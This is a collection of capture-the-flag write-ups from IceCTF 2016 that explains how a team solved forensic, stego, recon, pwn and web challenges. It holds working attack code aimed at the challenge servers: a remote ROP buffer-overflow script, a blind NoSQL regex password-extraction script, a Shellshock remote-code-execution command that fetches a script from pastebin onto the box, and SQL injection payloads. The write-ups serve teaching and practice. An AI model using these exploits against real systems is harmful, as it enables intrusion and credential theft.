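The decoding step in code, as an added example rather than code from the writeup: each 8-byte leftover-capture payload is a boot-protocol keyboard report (modifier byte, reserved byte, six key usage IDs from the HID Usage Tables referenced above). The decoder below emits a key on its first appearance in a report, honours the Shift modifiers, and can apply either the US QWERTY legends or the Dvorak legends, which is the remapping that turns the gibberish above into the flag. The reports it runs on are constructed from the flag for the demonstration, not taken from intercept.pcapng; the tshark field name in the usage note is the only other assumption.

```python
import string

# HID usage IDs (keyboard/keypad page 0x07) for a US QWERTY layout:
# usage -> (unshifted, shifted). Letters are 0x04-0x1d, digits 0x1e-0x27,
# then Enter, Space and the punctuation keys in HID Usage Table order.
QWERTY = {}
for i, ch in enumerate(string.ascii_lowercase):
    QWERTY[0x04 + i] = (ch, ch.upper())
for i, (ch, sh) in enumerate(zip("1234567890", "!@#$%^&*()")):
    Q = QWERTY[0x1E + i] = (ch, sh)
QWERTY.update({
    0x28: ("\n", "\n"), 0x2C: (" ", " "), 0x2D: ("-", "_"), 0x2E: ("=", "+"),
    0x2F: ("[", "{"), 0x30: ("]", "}"), 0x31: ("\\", "|"), 0x33: (";", ":"),
    0x34: ("'", '"'), 0x35: ("`", "~"), 0x36: (",", "<"), 0x37: (".", ">"),
    0x38: ("/", "?"),
})

# Dvorak relabels the same physical keys. Listed by key position: the QWERTY
# legend, and what Dvorak prints there (digits, Space and Enter are unchanged).
_QWERTY_POS = "qwertyuiop[]asdfghjkl;'zxcvbnm,./-="
_DVORAK_POS = "',.pyfgcrl/=aoeuidhtns-;qjkxbmwvz[]"
_DVORAK_POS_SHIFT = '"<>PYFGCRL?+AOEUIDHTNS_:QJKXBMWVZ{}'
DVORAK = {}
for usage, (lo, hi) in QWERTY.items():
    if lo in _QWERTY_POS:
        idx = _QWERTY_POS.index(lo)
        DVORAK[usage] = (_DVORAK_POS[idx], _DVORAK_POS_SHIFT[idx])
    else:
        DVORAK[usage] = (lo, hi)

SHIFT_MASK = 0x22  # left shift (bit 1) or right shift (bit 5) of the modifier byte


def decode_reports(reports, layout=QWERTY):
    """Decode 8-byte boot-protocol keyboard reports into the typed text.

    Report layout: [modifiers, reserved, key1..key6]. A key is emitted when it
    first appears (key-down edge); a key still held in the next report is not
    emitted again, and an unknown usage is rendered as <0x..>.
    """
    typed = []
    held = set()
    for rpt in reports:
        if len(rpt) != 8:
            raise ValueError(f"expected an 8-byte report, got {len(rpt)} bytes")
        shift = bool(rpt[0] & SHIFT_MASK)
        keys = [k for k in rpt[2:] if k]
        for k in keys:
            if k in held:
                continue
            pair = layout.get(k)
            typed.append(f"<{k:#04x}>" if pair is None else pair[1 if shift else 0])
        held = set(keys)
    return "".join(typed)


def encode_text(text, layout):
    """Build press/release report pairs that would type `text` on `layout`.
    Only used here to construct sample input for the decoder."""
    inverse = {}
    for usage, (lo, hi) in layout.items():
        inverse.setdefault(lo, (usage, 0x00))
        inverse.setdefault(hi, (usage, 0x02))  # typed with left shift
    reports = []
    for ch in text:
        usage, mods = inverse[ch]
        reports.append(bytes([mods, 0, usage, 0, 0, 0, 0, 0]))
        reports.append(bytes(8))  # all keys released
    return reports


def decode_hex_lines(lines, layout=QWERTY):
    """Decode leftover capture data exported one hex string per line,
    e.g. '02:00:09:00:00:00:00:00' (tshark) or '0200090000000000'."""
    reports = [bytes.fromhex(l.strip().replace(":", "")) for l in lines if l.strip()]
    return decode_reports(reports, layout)
```

To run it on the capture, export the payloads with `tshark -r intercept.pcapng -Y '(usb.transfer_type == 0x01) && (frame.len == 72)' -T fields -e usb.capdata` and pass the lines to `decode_hex_lines(lines, DVORAK)`; decoding the same lines with `QWERTY` reproduces the kind of gibberish shown above, with shifted punctuation rendered as the QWERTY legend of that key.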
iceCTF{wh0_l1k3s_qw3r7y_4nyw4y5}

eilco
--------------------------------------------------------------------------------
/2016/IceCTF2016/forensic/intercepted-conversations-pt1/kinesis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/forensic/intercepted-conversations-pt1/kinesis.png
--------------------------------------------------------------------------------
/2016/IceCTF2016/forensic/time-traveler/readme.md:
--------------------------------------------------------------------------------
# Time Traveler (Forensics · 45 pt)

The title 'Time Traveler' made me think of the Wayback Machine (archive.org), so I looked up the challenge address there: http://time-traveler.icec.tf/

There is a snapshot from 01 June 2016, and the flag can be read on that page.

The flag is : IceCTF{Th3y'11_n3v4r_f1||d_m4h_fl3g_1n_th3_p45t}
--------------------------------------------------------------------------------
/2016/IceCTF2016/misc/matrix/QRCode-2-Structure.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/misc/matrix/QRCode-2-Structure.jpg
--------------------------------------------------------------------------------
/2016/IceCTF2016/misc/matrix/matrix.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/misc/matrix/matrix.png
--------------------------------------------------------------------------------
/2016/IceCTF2016/misc/matrix/matrix2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/misc/matrix/matrix2.png
--------------------------------------------------------------------------------
/2016/IceCTF2016/misc/scavenger_hunt/crawl.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# Fetch each candidate page of the site and look for the IceCTF{...} flag pattern.

import re
import requests

FLAG_RE = re.compile(r"IceCTF\{.*?\}")

urls = [
    "https://icec.tf",
    "https://icec.tf/about",
    "https://icec.tf/faq",
    "https://icec.tf/contact",
    "https://icec.tf/sponsors",
]

for url in urls:
    r = requests.get(url)
    res = FLAG_RE.search(r.text)
    if res:
        print("Flag found in " + url + " ==> " + res.group(0))
    else:
        print("No flag in " + url)
--------------------------------------------------------------------------------
/2016/IceCTF2016/misc/scavenger_hunt/readme.md:
--------------------------------------------------------------------------------
# Scavenger Hunt

The flag is hidden in one of the site's pages, so I crawled them with a small home-made script (crawl.py):

```
No flag in https://icec.tf
No flag in https://icec.tf/about
No flag in https://icec.tf/faq
No flag in https://icec.tf/contact
Flag found in https://icec.tf/sponsors ==> IceCTF{Y0u_c4n7_533_ME_iM_h1Din9}
```
--------------------------------------------------------------------------------
/2016/IceCTF2016/misc/search/readme.md:
--------------------------------------------------------------------------------
# Search (Misc · 40 pt)

The challenge description gives the hint "...maybe its all about the conTEXT."
The emphasis on TEXT points to a DNS TXT record:

```
dig -t txt search.icec.tf

; <<>> DiG 9.9.5-9+deb8u6-Debian <<>> -t txt search.icec.tf
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 15523
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;search.icec.tf. IN TXT

;; ANSWER SECTION:
search.icec.tf. 300 IN TXT "IceCTF{flag5_all_0v3r_the_Plac3}"
...
```

The flag is : IceCTF{flag5_all_0v3r_the_Plac3}
--------------------------------------------------------------------------------
/2016/IceCTF2016/pwn/Demo/README.md:
--------------------------------------------------------------------------------
# Demo

I didn't know what the basename() function did and didn't want to spend a lot of time reading the documentation.

So I modified the original program to print what basename returns.
6 | ``` 7 | mkdir /tmp/bi 8 | cd /tmp/bi 9 | cp /home/demo/demo.c /tmp/bi 10 | vi /tmp/bi/demo.c 11 | ``` 12 | 13 | I added printf of basename and it printed: 14 | 15 | ``` 16 | $ /tmp/bi/demo 17 | demo 18 | ``` 19 | 20 | So I realized we just had to match the basename to icesh, I created a bash script: 21 | 22 | ``` 23 | vi /tmp/bi/icesh 24 | 25 | #/bin/sh 26 | /home/demo/demo 27 | ``` 28 | 29 | Then ran it and got the shell 30 | 31 | ``` 32 | ./tmp/bi/icesh 33 | cat /home/demo/flag.txt 34 | ``` 35 | 36 | -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/Gh.hop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/pwn/Ropi/Gh.hop -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/NC: -------------------------------------------------------------------------------- 1 | nc ropi.vuln.icec.tf 6500 2 | -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/flag.txt: -------------------------------------------------------------------------------- 1 | YES 2 | -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/p.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | import socket 4 | 5 | 6 | def adr_to_str16(add): 7 | a = hex(add + 0x1000000000000000) 8 | ret = chr(int(a[16:18], 16)) 9 | ret += chr(int(a[14:16], 16)) 10 | ret += chr(int(a[12:14], 16)) 11 | ret += chr(int(a[10:12], 16)) 12 | return ret 13 | 14 | 15 | 16 | ORI=adr_to_str16(0x080485c4) 17 | AG2=adr_to_str16(0xabcdefff) 18 | AG3=adr_to_str16(0x78563412) 19 | RET=adr_to_str16(0x08048569) 20 | AG1=adr_to_str16(0xbadbeeef) 21 | EZY=adr_to_str16(0x0804852d) 22 | PP1=adr_to_str16(0x08048395) 
PP2=adr_to_str16(0x080486ee)
PRO=adr_to_str16(0x0804862c)
FIN=adr_to_str16(0x08048400)
pile1=RET+PP1+AG1+EZY
pile1=44*"A"+pile1+"AAAA"
# this 0x40 = 64 byte stack chains ret(AG1) then ezy()
# this stack chains ori(AG2,AG3) then ezy()
pile2=ORI+PP2+AG2+AG3+EZY
pile2=44*"A"+pile2
# then pro() then ezy(), and finally exit()
pile3=PRO+EZY*4
pile3=44*"A"+pile3
pile4=44*"A"+FIN*5


HOST = "ropi.vuln.icec.tf"
PORT = 6500
s = socket.socket()
s.connect((HOST, PORT))
readbuffer=s.recv(1024)
print readbuffer
s.send(pile1)
readbuffer=s.recv(1024)
print readbuffer
s.send(pile2)
readbuffer=s.recv(1024)
print readbuffer
s.send(pile3)
readbuffer=s.recv(1024)
print readbuffer
s.send(pile4)
readbuffer=s.recv(1024)
print readbuffer
s.close()

# francois@athos:~/tmp/Gh/C2$ python p.py
# Benvenuti al convegno RetOri Pro!
# Vuole lasciare un messaggio?
#
# [+] aperto
#
# Benvenuti al convegno RetOri Pro!
# Vuole lasciare un messaggio?
#
# [+] leggi
# Benvenuti al convegno RetOri Pro!
# Vuole lasciare un messaggio?
#
# [+] stampare
# IceCTF{italiano_ha_portato_a_voi_da_google_tradurre}
# Benvenuti al convegno RetOri Pro!
# Vuole lasciare un messaggio?
#
# francois@athos:~/tmp/Gh/C2$

-------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/payload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/pwn/Ropi/payload
-------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/pile.py: --------------------------------------------------------------------------------
#!/usr/bin/python
def adr_to_str16(add):
    a = hex(add + 0x1000000000000000)
    ret = chr(int(a[16:18], 16))
    ret += chr(int(a[14:16], 16))
    ret += chr(int(a[12:14], 16))
    ret += chr(int(a[10:12], 16))
    return ret
ORI=adr_to_str16(0x080485c4)
AG2=adr_to_str16(0xabcdefff)
AG3=adr_to_str16(0x78563412)
RET=adr_to_str16(0x08048569)
AG1=adr_to_str16(0xbadbeeef)
# first attempt: ret(AG1) returns into ori, which sees AG2/AG3 as its arguments,
# but ori then returns into AG1 (0xbadbeeef) and the process crashes
pile=RET+ORI+AG1+AG2+AG3
pile=(64-len(pile))*"A"+pile
print pile
-------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/pile2.py: --------------------------------------------------------------------------------
#!/usr/bin/python
# encoding: utf-8
# This function turns an integer into 4 characters (little-endian)
def adr_to_str16(add):
    a = hex(add + 0x1000000000000000)
    ret = chr(int(a[16:18], 16))
    ret += chr(int(a[14:16], 16))
    ret += chr(int(a[12:14], 16))
    ret += chr(int(a[10:12], 16))
    return ret
# The idea is to run ret(AG1), which opens the flag, then
# ori(AG2,AG3), which reads the file, and finally pro(), which prints the buffer.
# We can overwrite 5 words of the stack by sending 44 bytes and then the 5 words.
# A function call is laid out as follows
# ......
# where pop n is a gadget doing n pops in a row.
# On the ret with this stack we land at the start of fct with the stack
# ......
# fct(ag1,...,agn) runs, then it returns into pop n with the stack
# ......
# This pop n pops the arguments and returns into the stack ...
# So the stack would have to be
# RET+PP1+AG1+ORI+PP2+AG2+AG3+PRO
# but that exceeds the 5 words we are able to overwrite.
# The trick is to call ezy() again, which gives us a fresh
# overwrite of the stack.

ORI=adr_to_str16(0x080485c4)
AG2=adr_to_str16(0xabcdefff)
AG3=adr_to_str16(0x78563412)
RET=adr_to_str16(0x08048569)
AG1=adr_to_str16(0xbadbeeef)
EZY=adr_to_str16(0x0804852d)
PP1=adr_to_str16(0x08048395)
PP2=adr_to_str16(0x080486ee)
PRO=adr_to_str16(0x0804862c)
pile=RET+PP1+AG1+EZY
pile=44*"A"+pile+"AAA"
# this 0x40 = 64 byte stack chains ret(AG1) then ezy()
print pile
# this stack chains ori(AG2,AG3) then pro()
pile=ORI+PP2+AG2+AG3+PRO
pile=44*"A"+pile
print pile
-------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/pile3.py: --------------------------------------------------------------------------------
#!/usr/bin/python
import sys
import socket


def adr_to_str16(add):
    a = hex(add + 0x1000000000000000)
    ret = chr(int(a[16:18], 16))
    ret += chr(int(a[14:16], 16))
    ret += chr(int(a[12:14], 16))
    ret += chr(int(a[10:12], 16))
    return ret



ORI=adr_to_str16(0x080485c4)
AG2=adr_to_str16(0xabcdefff)
AG3=adr_to_str16(0x78563412)
RET=adr_to_str16(0x08048569)
AG1=adr_to_str16(0xbadbeeef)
EZY=adr_to_str16(0x0804852d)
PP1=adr_to_str16(0x08048395)
PP2=adr_to_str16(0x080486ee)
PRO=adr_to_str16(0x0804862c)
FIN=adr_to_str16(0x08048400)
pile1=RET+PP1+AG1+EZY
pile1=44*"A"+pile1+"AAAA"
# this 0x40 = 64 byte stack chains ret(AG1) then ezy()
# this stack chains ori(AG2,AG3) then ezy()
# then pro() then ezy()
# and finally exit()
pile2=ORI+PP2+AG2+AG3+EZY
pile2=43*"A"+pile2
pile3=PRO+EZY*4
pile3=43*"A"+pile3
pile4=43*"A"+FIN*5


print(pile1)
print(pile2)
print(pile3)
print(pile4)

# francois@athos:~/tmp/Gh/C2$ python p.py
# Benvenuti al convegno RetOri Pro!
# Vuole lasciare un messaggio?
#
# [+] aperto
#
# Benvenuti al convegno RetOri Pro!
# Vuole lasciare un messaggio?
#
# [+] leggi
# Benvenuti al convegno RetOri Pro!
# Vuole lasciare un messaggio?
#
# [+] stampare
# IceCTF{italiano_ha_portato_a_voi_da_google_tradurre}
# Benvenuti al convegno RetOri Pro!
# Vuole lasciare un messaggio?
#
# francois@athos:~/tmp/Gh/C2$
-------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/readme.md: --------------------------------------------------------------------------------
In this archive you will find
* a source.c giving the pseudo code of the functions (thanks Hopper)
* the binary Gh
* 3 files pile.py, pile2.py and pile3.py that solve the challenge locally:
The file flag.txt contains YES:
```
francois@athos:~/tmp/Gh/C2$ python pile.py | ./Gh
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?
[+] aperto
[+] leggi
Segmentation fault
francois@athos:~/tmp/Gh/C2$ python pile2.py | ./Gh
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?
[+] aperto
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?
[+] leggi
[+] stampare
YES
Segmentation fault
francois@athos:~/tmp/Gh/C2$ python pile3.py | ./Gh
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?
[+] aperto
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?
[+] leggi
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?
[+] stampare
YES
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?
francois@athos:~/tmp/Gh/C2$
```

The explanations are in pile2.py.
The gadgets used are
0x08048395 : pop ebx ; ret
0x080486ee : pop edi ; pop ebp ; ret

p.py is the adaptation of the challenge to the remote target.
```
francois@athos:~/tmp/Gh/C2$ python p.py
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?

[+] aperto

Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?

[+] leggi
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?

[+] stampare
IceCTF{italiano_ha_portato_a_voi_da_google_tradurre}
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?

francois@athos:~/tmp/Gh/C2$
```

The flag is «IceCTF{italiano_ha_portato_a_voi_da_google_tradurre}»
-------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/ropi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/pwn/Ropi/ropi
-------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/solution.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/pwn/Ropi/solution.zip
-------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/source.c: --------------------------------------------------------------------------------
function main {
    ezy();
    puts("addio!");
    return 0x0;
}

function ezy {
    puts("Benvenuti al convegno RetOri Pro!\nVuole lasciare un messaggio?");
    eax = *stdout@@GLIBC_2.0;
    fflush(eax);
    eax = read(0x0, var_28, 0x40);
    return eax;
}

function ret {
    if (arg0 != 0xbadbeeef) {
        puts("chiave sbagliata! :(");
        exit(0x1);
    }
    else {
        *fd = open("./flag.txt", 0x0);
        puts("[+] aperto");
        eax = *stdout@@GLIBC_2.0;
        fflush(eax);
    }
    return;
}

function ori {
    if ((arg0 != 0xabcdefff) && (arg1 != 0x78563412)) {
        puts("chiave sbagliata! :((");
        exit(0x1);
    }
    else {
        eax = *fd;
        read(eax, 0x804a080, 0x80);
        puts("[+] leggi");
        eax = *stdout@@GLIBC_2.0;
        fflush(eax);
    }
    return;
}

function pro {
    puts("[+] stampare");
    printf(0x80487b7, 0x804a080);
    eax = *stdout@@GLIBC_2.0;
    eax = fflush(eax);
    return eax;
}
-------------------------------------------------------------------------------- /2016/IceCTF2016/recon/complacent/readme.md: --------------------------------------------------------------------------------
# Complacent (Reconnaissance · 40 pt)

I used nikto to scan the chall website:
```bash
nikto -h https://complacent.vuln.icec.tf

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          104.154.248.13
+ Target Hostname:    complacent.vuln.icec.tf
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject: /C=IS/ST=Kingdom of IceCTF/L=IceCTF city/O=Secret IceCTF Buisness Corp/OU=Flag: IceCTF{this_1nformation_wasnt_h1dd3n_at_a11}/CN=complacent.icec.tf
                   Ciphers: ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:  /C=IS/ST=Kingdom of IceCTF/L=IceCTF city/O=Secret IceCTF Buisness Corp/OU=Flag: IceCTF{this_1nformation_wasnt_h1dd3n_at_a11}/CN=complacent.icec.tf
```

The flag was in the SSL certificate, in the OU field of the subject. A certificate is sent to every client during the TLS handshake, so anything written in it is public (`openssl s_client -connect complacent.vuln.icec.tf:443` shows it just as well).

The flag is : IceCTF{this_1nformation_wasnt_h1dd3n_at_a11}
-------------------------------------------------------------------------------- /2016/IceCTF2016/stegano/vape-nation/flag_vape.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/stegano/vape-nation/flag_vape.png
-------------------------------------------------------------------------------- /2016/IceCTF2016/stegano/vape-nation/readme.md:
--------------------------------------------------------------------------------
# Vape Nation (Stego · 50 pt)

The flag is hidden with the LSB method.

I used the tool Stegsolve.jar -> Green plane 0

The flag can be read on the image

![Alt](flag_vape.png "Flag Vape Nation")

The flag is : IceCTF{420_CuR35_c4nCEr}
-------------------------------------------------------------------------------- /2016/IceCTF2016/web/chainedIN/readme.md: --------------------------------------------------------------------------------
#ChainedIn WU

First, the logo tells us the website uses MongoDB.

Analyzing with Firebug we can see the data is sent as JSON.

So I tried to inject on the admin login: the password should be the flag and begin with "IceCTF{"

```
ghozt@maze:~/ice/chained$ curl -H "Content-Type: application/json" -X POST -d '{"user":"admin","pass":{"$regex":"IceCTF{"}}' http://chainedin.vuln.icec.tf/login
```

It works! The JSON body goes straight into the MongoDB query, so the `pass` field can be replaced by a `{"$regex": ...}` operator, and the login answer ("Administrator" or "Invalid") becomes a yes/no oracle on the stored password. Let's script it!

```python
#!/usr/bin/python

import requests

url = "http://chainedin.vuln.icec.tf/login"

charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789}_"

print "[+] Getting password size ..."
# unanchored ".{i}" matches as long as the password has at least i
# characters, so the first "Invalid" comes at i = length + 1
for i in range(7, 100):
    payload = {'user':'admin','pass':{'$regex':'.{'+str(i)+'}'}}
    r = requests.post(url, json=payload)
    if "Invalid" in r.text:
        size = i - 1
        print "[+] Password size is "+str(size)
        break

print "[+] Getting password"
password = "IceCTF{"
while len(password) < size:
    for c in charset:
        payload = {'user':'admin','pass':{'$regex':password+c}}
        r = requests.post(url, json=payload)
        if "Administrator" in r.text:
            password = password + c
            print password
            break

```

And the result :

```
[+] Getting password size ...
[+] Password size is 55
[+] Getting password
IceCTF{I
IceCTF{I_
...
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_monGo}
```

Done !

By ghozt
-------------------------------------------------------------------------------- /2016/IceCTF2016/web/chainedIN/sploit.py: --------------------------------------------------------------------------------
#!/usr/bin/python

import requests

url = "http://chainedin.vuln.icec.tf/login"

charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789}_"

print "[+] Getting password size ..."
# unanchored ".{i}" matches as long as the password has at least i
# characters, so the first "Invalid" comes at i = length + 1
for i in range(7, 100):
    payload = {'user':'admin','pass':{'$regex':'.{'+str(i)+'}'}}
    r = requests.post(url, json=payload)
    if "Invalid" in r.text:
        size = i - 1
        print "[+] Password size is "+str(size)
        break

print "[+] Getting password"
password = "IceCTF{"
while len(password) < size:
    for c in charset:
        payload = {'user':'admin','pass':{'$regex':password+c}}
        r = requests.post(url, json=payload)
        if "Administrator" in r.text:
            password = password + c
            print password
            break
-------------------------------------------------------------------------------- /2016/IceCTF2016/web/exposed/README.md: --------------------------------------------------------------------------------
# Exposed

In this challenge we realized there was a flaw in the Apache configuration: the `.git` directory was served, so we were able to clone the source files from the git repository.

To get any repository from the website
```bash
mkdir exposed
cd exposed
git init
git remote add origin http://exposed.vuln.icec.tf/.git
git pull origin _hash_
```

The hash list was in the log file:

```bash
wget http://exposed.vuln.icec.tf/.git/logs/heads/master
```

We only needed to pull every hash listed.
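Back to the ChainedIn injection: the following is an added example, not the writeup's or the challenge's code. It models the vulnerable `/login` handler offline (the value of `pass` is handed to MongoDB unchanged, so a `$regex` object is evaluated against the stored password instead of being compared to it), runs the blind extraction against that model with the two things the writeup's script gets away without (a `^` anchor and `re.escape`, so `{` and `}` stay literal and the guess is pinned to the start of the value), and shows the hardened handler that refuses anything but a plain string. The stored password is the writeup's flag reused as constructed sample data, and True/False stand in for the "Administrator"/"Invalid" pages.

```python
import re
import string

# Constructed sample: the admin document the challenge's /login looks up.
ADMIN_PASSWORD = "IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_monGo}"


def login_vulnerable(user, password):
    """Stand-in for the challenge's handler: the JSON value of `pass` is
    used as-is in the Mongo query, so a {"$regex": ...} object gets
    evaluated against the stored password.  True == "Administrator" page."""
    if user != "admin":
        return False
    if isinstance(password, dict) and "$regex" in password:
        return re.search(password["$regex"], ADMIN_PASSWORD) is not None
    return password == ADMIN_PASSWORD


def login_hardened(user, password):
    """The fix: reject anything that is not a plain string before it can
    reach the query, so query operators are never interpreted."""
    if not isinstance(password, str):
        raise TypeError("password must be a string")
    return user == "admin" and password == ADMIN_PASSWORD


def find_length(oracle, max_len=200):
    """Anchored ^.{n}$ matches only the exact length, unlike the unanchored
    .{n} used in the writeup, which means 'at least n characters'."""
    for n in range(1, max_len + 1):
        if oracle("admin", {"$regex": "^.{%d}$" % n}):
            return n
    raise RuntimeError("password longer than %d" % max_len)


CHARSET = string.ascii_letters + string.digits + "_{}"


def extract_password(oracle, prefix="", charset=CHARSET):
    """Blind, character-by-character extraction through the regex oracle.
    Returns (recovered password, number of oracle queries)."""
    length = find_length(oracle)
    known = prefix
    queries = 0
    while len(known) < length:
        for c in charset:
            queries += 1
            # re.escape keeps '{', '}' and '.' literal; '^' pins the prefix
            if oracle("admin", {"$regex": "^" + re.escape(known + c)}):
                known += c
                break
        else:
            raise RuntimeError("no character of the charset matched at position %d" % len(known))
    return known, queries


if __name__ == "__main__":
    pw, n = extract_password(login_vulnerable, prefix="IceCTF{")
    print("%s recovered in %d queries" % (pw, n))
```

The same model explains why the writeup's unanchored `.{i}` length probe works: it only ever reports "at least i", which is why the first "Invalid" answer comes one past the real length.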

(note: the file is not the same as the cloned one).
The flag was located in the index.php file.
-------------------------------------------------------------------------------- /2016/IceCTF2016/web/flag-storage/readme.md: --------------------------------------------------------------------------------
# Flag Storage (Web · 50 pt)

The chall hint was "SQLi", so let's go!

`' OR 1=1; --` in the password field, anything in the login one, aaaaaand it's done!

The flag is : IceCTF{why_would_you_even_do_anything_client_side}
-------------------------------------------------------------------------------- /2016/IceCTF2016/web/geoip/README.md: --------------------------------------------------------------------------------
# GeoIP

The team found that we could get RCE (Shellshock: the CGI script hands the User-Agent header to bash as an environment variable) with this command:
```bash
curl -v -H "User-Agent: () { test;};echo \"Content-type: text/plain\"; echo; echo;/bin/bash -c 'perl /tmp/bi/DUbHRGqh select \* from 47a6fd2ca39d2b0d6eea1c30008dd889'" http://geocities.vuln.icec.tf/index.cgi
```

so I used pastebin to load the script onto the box:
```bash
wget -P /tmp/bi/ http://pastebin....
```

using the following file:
```perl
#!/usr/bin/perl
use DBI;
# the whole argument list is concatenated and run as one SQL statement
$my_cmd = "";
foreach $argnum(0 .. $#ARGV) {
    $my_cmd = $my_cmd . $ARGV[$argnum] . " ";
}
print $my_cmd;
my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities",
    "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;
my $sth = $dbh->prepare($my_cmd);
$sth->execute();
my $row;
while ($row = $sth->fetchrow_arrayref()) {
    print "@$row\n";
}
$sth->finish();
$dbh->disconnect();

```

then we could query the database easily using the script, the whole argument list of the perl script being the MySQL query

```bash
curl -v -H "User-Agent: () { test;};echo \"Content-type: text/plain\"; echo; echo;/bin/bash -c 'perl /tmp/bi/DUbHRGqh sql_query'" http://geocities.vuln.icec.tf/index.cgi

```

Results of the queries:

```
show tables;
Posts
47a6fd2ca39d2b0d6eea1c30008dd889

(note that * must be escaped in bash)
Select \* from 47a6fd2ca39d2b0d6eea1c30008dd889;
IceCTF{7h3_g0s_WEr3_5UpeR_wE1Rd_mY_3ye5_HUr7}
```

We got the flag!
-------------------------------------------------------------------------------- /2016/IceCTF2016/web/kitty/README.md: --------------------------------------------------------------------------------
# kitty (web · 70 pt)

They managed to secure their website this time and moved the hashing to the server :(.
We managed to leak this hash of the admin's password though! c7e83c01ed3ef54812673569b2d79c4e1f6554ffeb27706e98c067de9ab12d1a.
Can you get the flag?
kitty.vuln.icec.tf

First I checked the hash with a hash type checker :)

https://md5hashing.net/hash_type_checker


```
c7e83c01ed3ef54812673569b2d79c4e1f6554ffeb27706e98c067de9ab12d1a

```

It's a SHA-256 hash (64 hex digits)


Two solutions:

We can use hashcat to brute-force it, or check online whether the hash is already known (an unsalted hash of a short password is in every lookup table)


http://md5decrypt.net/Sha256/


```
c7e83c01ed3ef54812673569b2d79c4e1f6554ffeb27706e98c067de9ab12d1a : Vo83*

```

=> kitty.vuln.icec.tf : admin / Vo83*


Logged in!


Your flag is: IceCTF{i_guess_hashing_isnt_everything_in_this_world}


eilco
-------------------------------------------------------------------------------- /2016/IceCTF2016/web/miners/README.md: --------------------------------------------------------------------------------
# Miners

This one was really easy: it said you must log in, but there are no users in the database. The source code showed an obvious SQLi flaw on the username field.

username :
```
asdf' union select 1,2,3 #
```

The UNION supplies the row the login code expects (three columns), so it accepts a user that does not exist: I was logged in and had the flag.
-------------------------------------------------------------------------------- /2016/IceCTF2016/web/move-along/flag_move_along.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/web/move-along/flag_move_along.jpg
-------------------------------------------------------------------------------- /2016/IceCTF2016/web/move-along/readme.md: --------------------------------------------------------------------------------
# Move Along (Web · 30 pt)

Using Firebug we can see http://move-along.vuln.icec.tf/move_along/ (directory listing is enabled)

```
Index of /move_along/
../
0f76da769d67e021518f05b552406ff6/                  10-Aug-2016 19:07                   -
nothing-to-see-here.jpg                            10-Aug-2016 19:07               19453
```

Let's move to http://move-along.vuln.icec.tf/move_along/0f76da769d67e021518f05b552406ff6/

We got an image secret.jpg containing the flag

